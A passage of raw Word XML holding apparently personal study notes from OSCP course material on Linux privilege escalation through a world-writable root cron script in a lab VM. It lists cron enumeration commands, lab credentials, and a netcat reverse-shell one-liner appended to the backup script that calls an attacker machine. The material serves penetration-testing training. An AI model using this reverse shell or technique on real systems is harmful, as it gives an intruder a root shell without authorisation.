    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>
        </w:numPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing the directory contents, we notice several tasks scheduled to run daily.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A71">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It is worth noting that system administrators often add their own scheduled tasks in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/crontab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file. These tasks should be inspected carefully for insecure file permissions, since most jobs in this file will run as root. To view the current user's scheduled jobs, we can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">crontab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> followed by the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A72">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A73">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4157663" cy="3766485"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="390" name="image376.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image376.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId887"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4157663" cy="3766485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A74">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1446"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">crontab -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A75">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A76">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the above output, only the commented instructions are present, meaning no cron job has been configured for the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">joe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, if we try to run the same command with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> prefix, we discover that a backup script is scheduled to run every minute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A77">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A78">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2044700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="258" name="image239.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image239.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId88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2A79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1107"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo crontab -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A7A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A7B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing cron jobs using sudo reveals jobs run by the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user. In this example, it shows a backup script running as root. If this file has weak permissions, we may be able to leverage it to escalate our privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A7C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A7D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As we'll learn later in this Module, the joe user has been granted specific sudo permission only to list cron jobs running as the root user. This permission alone cannot be abused to obtain a root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A7E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A7F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A80">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_i62olp4aoffr" w:id="374"/>
      <w:bookmarkEnd w:id="374"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Checking Cron Log files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A81">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP (18.3.1. Abusing Cron Jobs) (Module 18 Linux Privilege Escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A82">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A83">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's focus on another family of privilege escalation techniques and learn how to leverage insecure file permissions. For this section, we will assume that we have already gained access to our Linux target machine as an unprivileged user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A84">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To leverage insecure file permissions, we must locate an executable file that not only allows us write access, but also runs at an elevated privilege level. On a Linux system, the</w:t>
      </w:r>
      <w:hyperlink r:id="rId889">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId890">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">cron</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> time-based job scheduler is a prime target, since system-level scheduled jobs are executed with root user privileges and system administrators often create scripts for cron jobs with insecure permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A85">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For this example, we will SSH into the VM 1 as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">joe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user, providing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a password. In a previous section, we demonstrated where to check the filesystem for installed cron jobs on a target system. We could also inspect the cron log file (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/cron.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) for running cron jobs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A86">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2120900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="30" name="image35.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image35.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId89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2A87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="922"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep "CRON" /var/log/syslog</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A88">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A89">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It appears that a script called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user_backups.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> under </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/joe/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is executed in the context of the root user. Judging by the timestamps, it seems that this job runs once every minute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A8A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we know the location of the script, we can inspect its contents and permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A8B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1778000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="88" name="image85.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image85.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId89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2A8C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A8D">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The script itself is fairly straight-forward: it simply copies the user's </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">home</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">backups</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> subdirectory. The</w:t>
      </w:r>
      <w:hyperlink r:id="rId893">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId894">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">permissions</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the script reveal that every local user can write to the file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A8E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since an unprivileged user can modify the contents of the backup script, we can edit it and add a reverse shell</w:t>
      </w:r>
      <w:hyperlink r:id="rId895">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId896">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">one-liner</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. If our plan works, we should receive a root-level reverse shell on our attacking machine after, at most, a one-minute period.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A8F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2921000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="237" name="image228.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image228.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId89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2A90">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1394"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 192.168.118.2 1234 &gt;/tmp/f" &gt;&gt; user_backups.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A91">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">All we must do now is set up a listener on our Kali Linux machine and wait for the cron job to execute:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A92">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4738688" cy="1389711"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62" name="image64.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image64.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId898"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4738688" cy="1389711"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
